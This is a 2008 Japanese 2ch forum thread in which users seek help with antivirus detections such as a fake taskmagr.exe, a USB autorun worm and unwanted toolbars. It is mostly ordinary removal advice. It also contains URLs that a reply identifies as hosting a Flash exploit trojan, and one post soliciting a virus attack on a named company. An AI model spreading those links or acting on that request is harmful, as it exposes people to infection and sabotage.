 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      |ファイアーウォール            │・検索オプション
      └────────────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索
60名無しさん@お腹いっぱい。sage2008/11/08(土) 00:41:31
>>58
ファイアーウォール(防火壁)とは、ある特定のコンピュータネットワークとその外部との通信を制御し
内部のコンピュータネットワークの安全を維持することを目的としたソフトウェア、あるいはそのソフトウェアを搭載したハードウェアである。
外部から内部のコンピュータネットワークへ侵入しようとするクラッキング行為を火事にたとえ、それを食い止めるものとして防火壁という表現を用いている。

>あとJCOMでホームページウイルススキャンサービスに入ってるんですが
>それだけでは ウイルスからは守られてないんでしょうか?
うん。
61名無しさん@お腹いっぱい。sage2008/11/08(土) 09:35:45
>>59 吹きましたw
>>60
回答ありがとうございます!!

ファイアーウォールだけでは守りが不十分だからノートンとかをいれたほうがいいんですよね?
62名無しさん@お腹いっぱい。sage2008/11/08(土) 09:37:58
あとファイアーウォールは必ずどのpcにも入ってるんですよね?
63 ◆0fQkHdNop2 sage2008/11/08(土) 09:40:17
>>58・・・・・>>60氏の回答に補足しとく。

JCOMのホームページウイルススキャンサービスだけではUSBやFD経由の
ウィルスは防止できないので、JCOMのユーザー無料サービスの
マイシールド(多分、アンラボのInternet Security )もダウンロード
してインストールしたら良い。
ついでに、メールウイルススキャンサービスと迷惑メール撃退サービスも
利用したら良い。
64名無しさん@お腹いっぱい。sage2008/11/08(土) 10:42:00
>>63
なるほど!
マイシ導入しておきます・・!
65 ◆0fQkHdNop2 sage2008/11/08(土) 11:02:43
>>61・・・・・>>61見ずに>>63投稿したので補足。

マイシールドをインストールするならノートンは入れる必要ない。
両方入れると不具合が起きるので、どちらか一方にすべきだ。
金持ちで金が余ってて、セキュリティー重視するなら、マイシールドより
ノートン・インターネットセキュリティー2009が良いけど、普通の人間の
場合は常識的に考えたらJCOMのユーザー無料サービスのマイシールド
選択が得だしプロバイダーのサポートも受けやすい。
66名無しさん@お腹いっぱい。sage2008/11/08(土) 13:32:26
悪意が潜在するプログラム Suspicious Driver Installation

オンゲしてたらフリートライアルのカスペがこんなの見つけたんだ
ググったけど意味がよくわからない
これって放置しててもいいのかな? 誰かお願いします
67 ◆0fQkHdNop2 sage2008/11/08(土) 14:03:27
>>66
カスペ・スレかゲーム関係の板のそのゲームのスレで聞いた方が良いと思う。

そのゲームが安全なゲームだとすれば、ゲームソフトのドライバーの
可能性が高いようにも思えるが、そのゲームもカスペの対応も知らないので
断言できない。ゲームソフトにセキュリティーホールがあってポート解放
してたらマルウェア入れられる可能性もあるかもしれない。
68名無しさん@お腹いっぱい。sage2008/11/08(土) 15:22:57
>>67
返信ありがとうございます
やはりゲームに関係してたのですね
これで対象外にできます
69名無しさん@お腹いっぱい。sage2008/11/08(土) 15:59:22
f.exe
70名無しさん@お腹いっぱい。2008/11/09(日) 17:27:55
【使用OS】 「windows VISTA HOME PREMIUM」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「AVG」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「トロイの木馬generic12.HNC」 ファイルパス C:\Program Files\VistaCodecPack\Tools\233.exe

たった今PC起動後すぐにウイルスが検出されたとメッセージが出て「この脅威の強制削除を行いますか?」  
という問いかけの下に 「はい」と「いいえ」のボタン、
そして(赤字で)「強制除去によりシステムが不安定になったかあるいはクラッシュしました」とメッセージが出ています。

また該当のファイルのプロパティを見てみると

ファイルの種類 アプリケーション(exe)
説明   233
作成日時 2007?年?10?月?19?日、??0:15:45
アクセス日時 2007?年?12?月?27?日、??19:01:51

とあり同じtoolsフォルダに「238」というファイルと
「reset」
ファイルの種類 アプリケーション(exe)
説明 new user account Setup

作成日時  2007?年?11?月?16?日、??10:58:36
アクセス日時 ?2007?年?12?月?27?日、??19:01:52

という計3つのファイルがあります。
ウイルス名を検索しても何も情報がないのでどうしたらいいか分からず不安です。
何かアドバイスがあればよろしくお願いします。
71名無しさん@お腹いっぱい。2008/11/09(日) 20:12:12
【使用OS】 「xp pro sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_STARTPA.DS」
「C:\WINDOWS\system32\taskmagr.exe」
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSTARTPA%2EDS

トレンドマイクロの該当ページを見ても削除方法が載っていないので、教えてください。
72名無しさん@お腹いっぱい。sage2008/11/09(日) 20:41:38
>>71
スペルは合っているか?
taskmgr.exeではなくtaskmagr.exeなんだな?
スタートページを書き換えるタイプのようだから
スタートページが書き換えられていないか確認。
自動実行されるようになっていないか確認。
「お気に入り」に書き足すやつもあるみたいだから、
ついでに「お気に入り」も確認しておこう。
その後該当ファイルを削除すればよいかと。
7372sage2008/11/09(日) 20:55:00
さらに「信頼済みサイト」に変な物が追加されてないかも確認しておこうか。
74 ◆0fQkHdNop2 sage2008/11/09(日) 20:59:44
>>70
とりあえず、VirusTotalで検査したら?
http://www.virustotal.com/jp/
75 ◆0fQkHdNop2 sage2008/11/09(日) 21:04:03
>>71-72
そう言えば、数日前、taskmgr.exeではなくtaskmagr.exeがあるという者が
いたような気がする。どのスレだったか忘れたが。
76 ◆0fQkHdNop2 sage2008/11/09(日) 21:09:38
初心者スレだった。
http://pc11.2ch.net/test/read.cgi/sec/1225537809/73n-75
73 :名無しさん@お腹いっぱい。:2008/11/04(火) 06:37:16
すみません、みなさんのXPのsystem32内に「taskmagr.exe」というバージョン情報タブがないexeはあります?
「taskmgr.exe」ではなく「taskmagr.exe」です。
77712008/11/09(日) 21:41:05
>>72
あら、スペル間違えてましたね。
taskmagr.exe でOKです。

スタートページもお気に入りも信頼済みサイトも何も異常無しなんですよ。
それでもウイルス検出されるんです。

それと、具体的な削除方法を教えてください。
system32から該当ファイルを削除しようとしても出来ないんです。
プロセスを終了させることも出来ません。
78 ◆0fQkHdNop2 sage2008/11/09(日) 21:54:44
>>77
安全確実にリカバリ。
VirusTotal検査結果↓
ttp://www.virustotal.com/analisis/169bacc2f9dc7a98b7fe134287197a3a

Startpageとかスパイウェアみたいな名前ついてるのもあるね。
7972sage2008/11/09(日) 22:02:37
>>77
初心者ではないのだろう?少し冷静になろう。
削除できないということは実行中なのだろう。
じぶんで起動していないなら自動実行されているのだろう。
だから「自動実行」するように設定されていないか確認しよう。
80712008/11/09(日) 22:45:55
>>78-79
いろいろとアドバイスありがとうございました。
無事削除出来ました。

セーフモードから削除するという初歩的?なことを忘れていました。
何年振りかの感染だったので忘れていたようです。
ご迷惑おかけしました。
81名無しさん@お腹いっぱい。sage2008/11/09(日) 23:53:09
質問なんですが最近でも山田ウィルスの亜種(ウィルス対策ソフトには引っ掛からない)は出ているんでしょうか?
それともほとんどの山田ウィルスは対策ソフトで対策対応済みですか?
82名無しさん@お腹いっぱい。sage2008/11/10(月) 01:33:08
出てない。
対応済み。
83名無しさん@お腹いっぱい。sage2008/11/10(月) 04:30:16
>>76
その>>73て俺なんだけど実はまだ格闘中なんだw
よく調べたらどんどんトロイが出てきて「OSインストールして一週間でなぜ・・・」
といろいろ検索してたらさっき↓を見つけた。
ttp://www.avpclub.ddns.info/discuz/thread-14859-1-1.html
実際俺はFlashGetを入れてるしソフ板のFlashGetスレでもチョロっと話しが出てたから
多分ビンゴだと思うんだけど。もうちょい調べてみる。
84名無しさん@お腹いっぱい。sage2008/11/10(月) 19:25:58
DrWebが対応してるみたいだから
Dr.Web CureIt!でも落としておけば?

FlashGetは以前のバージョンでスパイウエア疑惑があったが
今もそんな噂があるのか?
85名無しさん@お腹いっぱい。sage2008/11/10(月) 21:04:19
最近は聞かないな。
自分も数ヶ月前に入れてた(使えないからすぐ消した)けど何もなかった。
86名無しさん@お腹いっぱい。sage2008/11/11(火) 11:25:03
>>83

たぶんビンゴですね。うちも同じ症状です。FlashGet Version 1.9.6.1073導入済。
定期的にアップされるファイルをダウンするために毎日バッチでFlashGetを動かしだしてから。
10/4  sprint.dll
10/25 dmsvct.dll
10/25 xmlpro.dll
11/7  dmserv.dll
いずれもC:\WINDOWS\system32\にあるのをNortonが発見、検疫されました。
で、きょうカスペルスキー オンラインスキャナかけたらtaskmagr.exe見つけました。
ご丁寧にほかのwindowsシステムファイルと日時あわせてあります。
状況証拠だけで、クロと決まったわけではありませんが、疑わざるを得ません。
バッチ機能、便利だったんですが残念ですね。気持ち悪いのでOSごと再導入します。
87名無しさん@お腹いっぱい。sage2008/11/11(火) 17:20:00
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
88名無しさん@お腹いっぱい。sage2008/11/11(火) 22:47:24
188 名無しさん@お腹いっぱい。 mail:sage  2008/11/11(火) 17:16:09

ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
89名無しさん@お腹いっぱい。sage2008/11/12(水) 00:08:07
山田ウィルスなんですが、hostファイルのlocalhostに127.0.0.1以外のIPアドレスがあれば感染している可能性とあるんですが、
127〜の下の行に::1と書かれています。これはウィルスでしょうか?それとも、問題ありませんか?
90名無しさん@お腹いっぱい。sage2008/11/12(水) 00:20:35
激しく板違い。
割れ厨に教えることは何もありません。

91名無しさん@お腹いっぱい。sage2008/11/12(水) 00:29:51
>>89
ここを参考
ttp://www.geocities.jp/yamada_guard_member/

>>90
勝手に割れ厨って決めつけるなよwお前と違うんだからww

92名無しさん@お腹いっぱい。sage2008/11/12(水) 01:31:25
テンプレ補足

P2P(Winny、Share、etc.)ウイルス(キンタマ、山田、原田、etc.)は板違い。移動しろ。
P2P以外(アップローダ、etc.)で踏んだとしても移動しろ。
Download
http://changi.2ch.net/download/
キンタマ、山田、ニュイルスなどでスレ探せ。
93名無しさん@お腹いっぱい。sage2008/11/12(水) 02:05:26
圧縮されてるファイル(ウイルス入り)は
マウスオーバーとか移動させたりしただけで感染しますか?
94名無しさん@お腹いっぱい。sage2008/11/12(水) 02:22:23
問題ない。
95名無しさん@お腹いっぱい。sage2008/11/12(水) 02:31:53
>>94
thx
96名無しさん@お腹いっぱい。2008/11/13(木) 00:40:20
Celeron433、メモリ512MB、Windows2000のPCに
アンチウイルスとアンチスパイウェアを入れたいのですが、
オススメがあれば教えてください。
97名無しさん@お腹いっぱい。sage2008/11/13(木) 01:11:04
【使用OS】 XP Home SP2
【使用ブラウザ】  Internet Explorer 6

HDD内をいろいろ見てたら
「TEMP」の中にIE5のデータが残ってるみたいなんですが
これって消去しても問題あにでしょうか?
というか、「TEMP」の中のファイルを全部消しちゃっても大丈夫でしょうか?
98名無しさん@お腹いっぱい。sage2008/11/13(木) 05:48:08
父があるアーティストの曲が聴きたいといっていたので
父のフラッシュメモリを借りてそこに曲を入れてやろうと思い、恥ずかしながらp2pソフトで曲をダウンロードしました
wmpで再生しようとすると、mp3の形式が違う云々と出てきたのですが、アイコンがmp3のものだったので無視してしまいましたところ
急にIEが開きmp3.exeという名のダウン窓が出てきたのでダウンロードせず閉じたのですが
この時点でウイルスには感染しないのでしょうか
父のフラッシュメモリを挿したままのことだったので
父がまだ仕事をしており、父のPCの情報が漏洩しないかとても不安です

携帯からで変な文かと思いますが宜しくお願いします
99名無しさん@お腹いっぱい。sage2008/11/13(木) 05:53:24
>>98
テンプレ嫁
ここはそういう質問スレじゃないから
100名無しさん@お腹いっぱい。sage2008/11/13(木) 06:11:29
移動します
すいませんでした
101名無しさん@お腹いっぱい。sage2008/11/13(木) 22:55:16
俺も今タククマネージャ見たらtaskmagr.exeがいた
確かにここ何日かにFlashget入れてたな
うーんこれさえなければ悪いソフトじゃないんだが
ノートン先生が無反応なとこ見るとウィルスではないんだろうか
でも名前がめっちゃウィルスっぽい
102名無しさん@お腹いっぱい。sage2008/11/13(木) 22:59:54
( ´_ゝ`)
103名無しさん@お腹いっぱい。sage2008/11/13(木) 23:12:56
というかノートンが糞なのか
ひょっとして
104名無しさん@お腹いっぱい。sage2008/11/14(金) 16:19:24
今頃気づいたのか?
105名無しさん@お腹いっぱい。sage2008/11/16(日) 02:53:31
ウィルスについての質問なんだけど。
Trojan.Generic.1007377ってどんなウィルスなんだ?
Bitdeffenderを使って調べたところ見つけたんだが、ググっても出てこない。
106名無しさん@お腹いっぱい。2008/11/16(日) 02:57:32
スペル間違えた
BitdeffenderでなくてBitdefenderだった
107名無しさん@お腹いっぱい。sage2008/11/16(日) 04:12:28
>>105
検出されたファイルをVirusTotalに上げて他社の検出名でググってみたら?
108名無しさん@お腹いっぱい。sage2008/11/16(日) 04:43:51
>>107
同意
Genericだから、ヒューリの可能性が高いし
109名無しさん@お腹いっぱい。sage2008/11/16(日) 05:52:45
まずVirus Totalで調べたところ、44.45%になった。
以下、検出結果。
AntiVir 7.9.0.31    TR/Crypt.XPACK.Gen
Avast 4.8.1281.0    Win32:Trojan-gen {Other}
AVG 8.0.0.199     SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001

他は検出していない。
これってウィルスなんだろうか?
110名無しさん@お腹いっぱい。sage2008/11/16(日) 06:01:23
半角スペース使ったため隙間が省略されてしまった。
かなり見づらくなってるから再度。
AntiVir 7.9.0.31        TR/Crypt.XPACK.Gen
Avast 4.8.1281.0        Win32:Trojan-gen {Other}
AVG 8.0.0.199          SHeur.CDNZ
BitDefender 7.2        Trojan.Generic.1007377
CAT-QuickHeal 10.00      (Suspicious) - DNAScan
eSafe 7.0.17.0         Suspicious File
Ikarus T3.1.1.45.0       Trojan.Crypt.XPACK
GData 19            Trojan.Generic.1007377
K7AntiVirus 7.10.526      Trojan.Win32.Malware.1
McAfee 5435           Generic.dx
Norman 5.80.02         W32/Malware.EEGT
Panda 9.0.0.4          spicious file
SecureWeb-Gateway 6.7.6     Trojan.Crypt.XPACK.Gen
Sophos 4.35.0          Mal/EncPk-CR
Sunbelt 3.1.1801.2       VIPRE.Suspicious
TrendMicro 8.700.0.1004     PAK_Generic.001
111名無しさん@お腹いっぱい。sage2008/11/16(日) 06:21:38
これだけ検出されると可能性は高いんじゃない?
ベンダにファイルを提出すれば検査結果を教えてくれるよ。
112名無しさん@お腹いっぱい。sage2008/11/16(日) 12:57:08
ありがとう。
ベンダに提出してみます。
113名無しさん@お腹いっぱい。2008/11/16(日) 17:42:43
CとDがクリックで開かなくなった…
スクリプトファイルが見つかりませんって…
114名無しさん@お腹いっぱい。sage2008/11/18(火) 09:43:22
AVGバージョン8で、generic10.caqというウィルスが検出されました。
対処はできたんですが、このウィルスがどんなものなのかググってもわかりません。
AVGの指示通り処理すれば大丈夫ですかね?
115114sage2008/11/18(火) 09:46:02
ググったら、「ca」はあったのですが「caq」はヒットしなかった、ということです。
116名無しさん@お腹いっぱい。sage2008/11/18(火) 09:51:50
名前なんてアンチウイルスによってバラバラなんだから
AVGスレで聞けば?
117名無しさん@お腹いっぱい。sage2008/11/19(水) 20:29:07
>>114
genericでぐぐれうんこ
118名無しさん@お腹いっぱい。2008/11/20(木) 04:44:03
アルボッキ性膜ってスレにあるアルバック成膜鰍フ糞会社のPCにウィルス贈呈したいんだけど誰かやっちゃってくれません?
あんな会社目障りなので無くなってほしいんです
会社のPCとかに潜り込んで目茶苦茶にしたいんですが出来ませんかねぇ
119名無しさん@お腹いっぱい。sage2008/11/20(木) 08:23:58
>>118
その程度の頭じゃ無理
120名無しさん@お腹いっぱい。2008/11/20(木) 12:27:32
IPアドレスの認証や確立を妨げるウイルスってありますか?
常接なんですが、ヤケにDLに時間のかかるメールを受信した後、
PCを再起動したらIPアドレスの確立と認証ができなくなっていました。
ハード的にはLANを認識しているみたいです。
1212008/11/20(木) 12:29:20
ほぼ同時に3台やられたんで、泣き…です。
122名無しさん@お腹いっぱい。2008/11/20(木) 14:44:51
男性俳優板行くとカスペが反応するんだけどなにこれ。
http://u.cruze3.cn/ihhh.html
トロイの木馬っつーんだけどほんと?
123名無しさん@お腹いっぱい。sage2008/11/20(木) 14:57:27
直リンするんじゃねーよ。
FlashPlayerの脆弱性を使うトロイだな。
9.0.124未満ならあぼん。
124名無しさん@お腹いっぱい。2008/11/20(木) 14:58:40
ごめん。

>9.0.124未満ならあぼん。

そうなんだ。
つーか2chのあちこちの板にしかけられててこわひ。。
125名無しさん@お腹いっぱい。sage2008/11/20(木) 15:06:46
tp://u.cruze3.cn/14.htm
tp://u.cruze3.cn/office.htm
あとこれもついてきた。

2ch開くだけでなんでこんなウィルスついてくんの?
126名無しさん@お腹いっぱい。sage2008/11/20(木) 15:07:56
ググッても出てこないし。
こえー。
127名無しさん@お腹いっぱい。sage2008/11/20(木) 15:08:03
そのサイトの調査結果
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fu.cruze3.cn%2Fihhh.html&x=73&y=5
検出されたマルウェアの詳細
ttp://www.f-secure.co.jp/v-descs/v-descs3/Exploit_JS_RealPlr.T.htm

URL直に貼るな粕。
128名無しさん@お腹いっぱい。sage2008/11/20(木) 15:09:15
>>125
板開いてもそんなの無いぞ。
ブラウザのキャッシュ壊れてんじゃね?
129名無しさん@お腹いっぱい。2008/11/20(木) 15:21:18
>>128
www.proxylist.sakura.ne.jp
これ開いたらだった
ごめん

男性俳優板じゃなかった。スマソ
130ナイトウォッチ2008/11/20(木) 16:14:17
ガイシュツかも・・・
無料でウィルス検索できるサイト教えてください。
パソコンまだなれてなくて・・
メールを送ったらおかしくなったっていわれてウィルスかな?と思って
131名無しさん@お腹いっぱい。sage2008/11/20(木) 17:48:30
>>130
なんでアンチウイルスソフト入れないの?
馬鹿なの?
132ナイトウォッチ2008/11/20(木) 19:20:01
小さい会社のパソコンで入ってないみたいなんですよね;;
ノートンいれます。
133名無しさん@お腹いっぱい。2008/11/20(木) 22:04:58
>>132
ほらよ
http://pc11.2ch.net/test/read.cgi/sec/1223797859/l50
134【来週強行・革命成立?】最凶の国籍法改正案 2008/11/21(金) 01:10:28
【来週強行・革命成立?】最凶の国籍法改正案 vs 最強のFAX凸撃 01/18
http://jp.youtube.com/watch?v=YImAqU2zAQc
http://jp.youtube.com/watch?v=uP4zK7m4Cyc   02/18
http://jp.youtube.com/watch?v=4cHbJW9gzp4   03/18
http://jp.youtube.com/watch?v=PAjrcPtmduA   04/18
http://jp.youtube.com/watch?v=8DpSuTjCCrI   05/18
http://jp.youtube.com/watch?v=3RYisOil36o   06/18
2時間目
http://jp.youtube.com/watch?v=gQzKzHnT0us   07/18
http://jp.youtube.com/watch?v=RGtk9TTl8kg   08/18
http://jp.youtube.com/watch?v=HOA0sXW06Nw   09/18
http://jp.youtube.com/watch?v=E9fex2t3Pc4   10/18
http://jp.youtube.com/watch?v=3x8xLaSKx-U   11/18
http://jp.youtube.com/watch?v=rLLIQsb-RnM   12/18
3時間目
http://jp.youtube.com/watch?v=PahmTsltQL8   13/18
http://jp.youtube.com/watch?v=FAwe1XnrbBU   14/18
http://jp.youtube.com/watch?v=NRIwYTMhGJM   15/18
http://jp.youtube.com/watch?v=n9bNXh5yBew   16/18
http://jp.youtube.com/watch?v=Z6Cujkj8SGk   17/18
http://jp.youtube.com/watch?v=-2HTuEiNpT4   18/18
135名無しさん@お腹いっぱい。sage2008/11/21(金) 07:19:25
ツマンネ
136名無しさん@お腹いっぱい。sage2008/11/21(金) 08:44:56
>>134
つまんねー
137名無しさん@お腹いっぱい。sage2008/11/22(土) 22:53:38
【使用OS】  『XP pro 2002 sp3』 
【使用ブラウザ】  『IE6』
【Microsoft Updateの更新の状態】  『自動更新設定』
【セキュリティソフトと年式】   『ウィルスセキュリティZero』
スパイウェア・ボット対策ソフト 『無』

【回線の種類・ルータの有無】  『ADSL マンション』

【具体的な症状】
突然しねしね団Flashが再生される。
DLした覚えはないです。
画面が閉じれない
【過程と措置】強制終了→起動→ウイルス検査
【その他】 海外赴任(インドネシア)の日本人です。
突然フラッシュが「死ね死ね 日本人」と始まり
身の危険も感じております。恨みを買われる覚えもあります。

どうかアドバイスお願い致します。
138 ◆N9P3SuvBPo sage2008/11/23(日) 00:25:30
>137
セキュ質で回答が得られなかったとはいえ、マルチするのは良くありませんよ。
焦らずじっくり待ってみましょ。
139名無しさん@お腹いっぱい。sage2008/11/23(日) 13:24:30
http://koideai.com/up/src/up9795.png
アドレスはPCの状態の画像です
検索したけどよくわかりません・・・
バスターで反応しなかったからウィルスじゃないのかな
このツールバーがサイトまわってたら知らないうちに入ってて
アンインストールしようとしても変なサイトに飛ばされそうになって
恐ろしくて途中で中断してしまいます

詳しいこと知ってる人これが一体何なのか教えてください・・・;
140名無しさん@お腹いっぱい。sage2008/11/23(日) 14:26:51
「Pirate Bay」っていうBit Torrentのファイル検索エンジンのツールバーみたい。
普通にアインストールしても大丈夫じゃない?
どっかにのサイトに飛ばされるのが嫌なら
FWの方でアンインストールする時だけIEのネットワーク接続を遮断すればいいし。

まぁ、これに懲りたらブラウザを変えることですな。
141名無しさん@お腹いっぱい。sage2008/11/23(日) 21:24:09
なぜかさっきの画像が出会い系に飛ぶようになっとる・・・
ウィルス関係ではないんですね
それが聞けただけでも安心できます!
とりあえず消してきます
142名無しさん@お腹いっぱい。2008/11/26(水) 00:21:52
PCを起動すると勝手に音楽が始まる…。
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
143名無しさん@お腹いっぱい。sage2008/11/26(水) 00:54:25
俺のじゃないから問題なし
安心して寝な
144名無しさん@お腹いっぱい。sage2008/11/27(木) 00:12:42
>>142
勝手にieがコッソリ立ち上がる奴だろ?俺も同様な症状だ
極論だがieをアンインストールしてFirefoxらへんを使えば一応解決するとは思うが・・・
ウイルス対策ソフトの対応待ちか?
145名無しさん@お腹いっぱい。2008/11/27(木) 18:33:12
>>142
俺も同症状だ。
IEをアンインストールで解決するの?
146名無しさん@お腹いっぱい。sage2008/11/27(木) 20:15:56
とりあえずIEをリネームして様子見してはどうか
147 ◆N9P3SuvBPo sage2008/11/27(木) 20:52:45
>142
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
148名無しさん@お腹いっぱい。sage2008/11/27(木) 21:42:24
>>142
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
http://www.anvir.com/
149名無しさん@お腹いっぱい。sage2008/11/27(木) 22:46:58
【使用OS】   XP Home SP2
【セキュリティソフトと年式】 ウイルスバスター2009 
【スパイウェア対策ソフト】  同上

【回線の種類・ルータの有無】 ADSL ルーター有

【具体的な症状】 
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。

どうしたらよいのでしょうか?

感染したファイルは
C\WINDOWS\system32\msGDl1.dllです

よろしくお願いいたします。
150名無しさん@お腹いっぱい。2008/11/28(金) 01:57:39
>>142です!

みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。

ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
151名無しさん@お腹いっぱい。sage2008/11/28(金) 12:45:25
スレイプニルでネット巡回中、突然「こんにちは!こんにちは!」というポップアップ表示がでてきました。
これは最近流行のウィルスだったりします?
152名無しさん@お腹いっぱい。sage2008/11/28(金) 12:46:23
ああ、やばいな
153名無しさん@お腹いっぱい。sage2008/11/28(金) 14:26:46
はまちちゃんだな
154名無しさん@お腹いっぱい。2008/11/29(土) 02:54:11
ルックルックこんにちはだな
155名無しさん@お腹いっぱい。sage2008/11/29(土) 10:39:11
USBをさしたらウイルスソフトの反応があってRECYCLERというフォルダとAutorun.infがありました
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
156 ◆0fQkHdNop2 sage2008/11/29(土) 12:08:36
>>155
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)

尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。

また、USBワームの感染経路も調べる事を推奨します。
157 ◆0fQkHdNop2 sage2008/11/29(土) 12:28:57
>>155
今後の事を考えて自動再生をオフにされる事を推奨します。
http://windowshelp.microsoft.com/Windows/ja-JP/Help/40f23376-1351-49d5-8d48-5c05d35f2ac81041.mspx
158名無しさん@お腹いっぱい。sage2008/11/29(土) 17:32:02
>>156
ありがとうございます。
システムの復元をしたところ今度はwindowsがまともに起動しなくなりました。
とりあえず復元前に戻しましたが、もうリカバリしようかと思います。
159名無しさん@お腹いっぱい。sage2008/11/29(土) 18:44:02
その方が賢明だねw
160名無しさん@お腹いっぱい。sage2008/12/04(木) 17:13:06
ウィルスバスターがウィルスの定義ファイル更新したら
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
161名無しさん@お腹いっぱい。sage2008/12/04(木) 17:24:04
リアルタイム検索にある

受信メール検索
送信メール検索

を切ったらOKになった
氏ね
162名無しさん@お腹いっぱい。2008/12/04(木) 22:26:57
>>142さん
その後の状況はどうですか。
同じ症状が出ました。
163名無しさん@お腹いっぱい。sage2008/12/04(木) 22:46:23
>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
164162sage2008/12/04(木) 22:47:45
↑ミスったので修正…
>>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>>162さんはいれてないですか?
165名無しさん@お腹いっぱい。sage2008/12/05(金) 01:02:26
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
166名無しさん@お腹いっぱい。sage2008/12/05(金) 02:19:42
セキュリティ初心者質問スレッドpart114
http://pc11.2ch.net/test/read.cgi/sec/1225537809/784

784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
167名無しさん@お腹いっぱい。2008/12/05(金) 12:38:59
>>142です!
報告が遅くなりすみませんでした。
IEを削除し、再インストールしました。
その後、2日経っていますが音楽は鳴らなくなりました!
みなさんありがとうございました!
168名無しさん@お腹いっぱい。sage2008/12/05(金) 13:49:11
名前:(c) C:\WINDOWS\system32\dmserver.dll
脅威の名称: (D)W32/Patcher
状態:(E) 1025  
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
